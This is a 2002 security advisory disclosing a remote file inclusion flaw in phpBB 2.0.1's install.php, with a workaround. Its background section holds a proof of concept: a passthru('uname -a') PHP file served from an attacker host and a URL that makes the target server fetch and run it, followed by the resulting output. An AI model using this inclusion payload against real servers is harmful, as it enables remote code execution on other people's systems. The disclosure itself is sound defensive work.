JCC Security Advisory June 16, 2002 malicious PHP source injection in phpBB Description phpBB is one of popular PHP bulletin board systems. When allow_url_fopen = On and register_globals = On in php.ini, phpBB has vulnerability because install.php contains dangerous codes. So an attacker can include any files into server's PHP codes. Impact It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected. Workaround allow_url_fopen = off and register_globals = off. and if complete install remove or rename install.php. Or in install.php -------install.php------------ define('IN_PHPBB', true); $phpbb_root_path='./'; ---------------------------- Put it -------snip----------------- $phpbb_root_dir='./'; ---------------------------- Good idea to code that <<PHP_CODE ini_set("register_globals", "Off"); ini_set ("allow_url_fopen", "Off"); PHP_CODE Tested systems phpBB 2.0.1 Debian GNU/Linux SID(x86) Background We checked the vulnerability with "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and made a sample code, functions_selects.php, --------------------includes/functions_selects.php-------------- <? passthru("uname -a"); ?> ----------------------------------------- and type the following URL to invoke this sample code. TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/" -------out put---------------------------- Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown Warning: Cannot add header information - headers already sent by (output started at in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182 Warning: Cannot add header information - headers already sent by (output started at in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183 Warning: Cannot add header information - headers already sent by (output started at in /home/morris/public_html/tmp/phpBB2/install.php on line 346 ----------------------------------------- thx for BlackKnight at r0ar --- http://jcc.hackerslab.org(at morris Chang) e-mail : morrisat_private
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